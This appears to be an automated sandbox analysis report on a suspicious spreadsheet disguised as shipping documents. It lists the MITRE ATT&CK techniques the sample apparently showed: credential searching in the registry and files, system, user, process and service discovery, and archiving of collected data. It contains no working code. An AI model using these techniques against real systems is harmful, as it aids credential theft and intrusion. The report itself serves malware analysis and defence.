C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Windows Analysis Report
waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre